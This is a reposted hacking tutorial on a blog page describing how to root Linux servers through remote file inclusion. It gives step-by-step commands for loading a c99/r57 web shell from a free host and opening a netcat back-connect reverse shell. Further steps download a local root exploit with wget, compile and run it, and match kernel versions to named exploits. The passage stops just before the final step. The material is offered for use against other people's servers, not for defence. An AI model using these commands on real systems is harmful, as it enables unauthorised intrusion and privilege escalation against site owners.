-r-f-i-rooting-tutorial

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

    Since this is asked so much and all we see are defaces without r00t. Here's a Tut.

    I take no credit for this.


    EDIT:Cleaned it up to make it readable and edited it a bit. (Evox)

    R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)
    notice:
    You will need:
    - Vulnerable Site in R.F.I.
    - Shell for R.F.I. (e.g. c99, r57 or other)
    - NetCat
    - Local Root Exploit (depending on the kernel and the version)
    This aim tutorial is to give a very general picture in process of Rooting
    in Linux Server with Safe Mod: OFF.

    -
    Suppose that we have found a site with R.F.I. vulnerability:
    http://www.example.com/folder/index.html?page=

    We can run shell exploiting Remote File Inclusion, as follows:
    Code:

    http://www.hackedsite.com/folder/ind...vilscript.txt?

    where evilscript.txt is our web shell that we have already uploaded to
    a free web hosting site.

    Some sites you could use:
    Welcome to Ripway.com - free file hosting, free music hosting, direct linking
    0Catch.com - free and affordable hosting plans for business and personal web sites including CGI and FrontPage Support


    After we enter our shell, we will see the version of the kernel at the top of the page or by typing:
    Code:

    uname - a

    in Command line.


    To continue we must connect with backconnection to the box.
    This can done with two ways if we have the suitable shell.
    We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
    in a writable folder.

    In most of the shells there is a backconnection feature without to upload the
    Connect Back Shell (or another one shell in perl/c).

    We will analyze the first way which is inside the shell (in our example the shell is r57).

    Initially we open NetCat and give to listen in a specific port.
    (this port must be correctly opened/forwarded in NAT/Firewall if we have a router)


    We will type: 11457 in the port input (This is the default port for the last versionsof r57 shell).
    We can use and other port as well.

    Setting up netcat to listen on backconnection port:
    We press in Windows Start > Run > and we type: cmd
    After we will go to the NetCat directory:
    Code:

    cd C:\Program Files\Netcat

    And we type the following command:
    Code:

    nc -n -l -v -p 11457

    The following will be the output if entered correctly:
    Code:

    NetCat respond: listening on [any] 11457 ...


    In the central page of r57 shell we find under the following menu::: Net:: and back-connect.
    In the IP Form we will type our IP
    (www.cmyip.com to see our ip if we have dynamic)

    In the Port form we will put the port that we opened and NetCat listens. 11475
    If we press connect the shell will respond:
    Code:

    Now script try connect to (your ip here) on port 11457 ...

    If our settings are correct NetCat will give us a shell to the server.

    Now we will continue to the Rooting process.

    We must find a writable folder in order to download and compile the Local
    Root Exploit that will give us root privileges in the box.
    Depending on the version of the Linux kernel there are different exploits.
    Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions.


    List of the exploits/kernel:
    Code:

    2.4.17 -> newlocal, kmod, uselib24
    2.4.18 -> brk, brk2, newlocal, kmod
    2.4.19 -> brk, brk2, newlocal, kmod
    2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
    2.4.21 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22-10 -> loginx
    2.4.23 -> mremap_pte
    2.4.24 -> mremap_pte, uselib24
    2.4.25-1 -> uselib24
    2.4.27 -> uselib24
    2.6.2 -> mremap_pte, krad, h00ly****
    2.6.5 -> krad, krad2, h00ly****
    2.6.6 -> krad, krad2, h00ly****
    2.6.7 -> krad, krad2, h00ly****
    2.6.8 -> krad, krad2, h00ly****
    2.6.8-5 -> krad2, h00ly****
    2.6.9 -> krad, krad2, h00ly****
    2.6.9-34 -> r00t, h00ly****
    2.6.10 -> krad, krad2, h00ly****
    2.6.13 -> raptor, raptor2, h0lly****, prctl
    2.6.14 -> raptor, raptor2, h0lly****, prctl
    2.6.15 -> raptor, raptor2, h0lly****, prctl
    2.6.16 -> raptor, raptor2, h0lly****, prctl

    We will see the case of 2.6.8 Linux kernel.
    We will need the h00ly**** exploit.
    We can find writable folders/files by typing:
    Code:

    find / -perm -2 -ls

    We can use the /tmp folder which is a standard writable folder
    We type:
    Code:

    cd /tmp

    To download the local root exploit we can use a download command for linux like
    wget.

    For example:
    Code:

    wget http://www.Example/localroot/h00ly****.c

    where http://www.Example.com/localroot/h00ly****.c is the url of h00ly****.

    After the download we must compile the exploit.
    (Read the instruction of the exploit before the compile)

    For the h00ly**** we must type:
    Code:

    gcc h00ly****.c -o h00ly****

    Now we have created the executable file: h00ly****.
    The command to run this exploit is:
    Code:

    ./h00ly**** <very big file on the disk>

    We need a very big file on the disk in order to run successfully and to get root.
    We must create a big file in /tmp or into another writable folder.
    The command is:
    Code:

    dd if=/dev/urandom of=largefile count=2M

     where largefile is the filename.


    We must wait 2-3 minutes for the file creation
    If this command fails we can try:
    Code:

    dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

     Now we can proceed to the last step. We can run

{ 0 comments... Skip to Comments }

Please comment here

 

IP Address

IP

Followers

Be Huge © 2012 | Template By Be Huge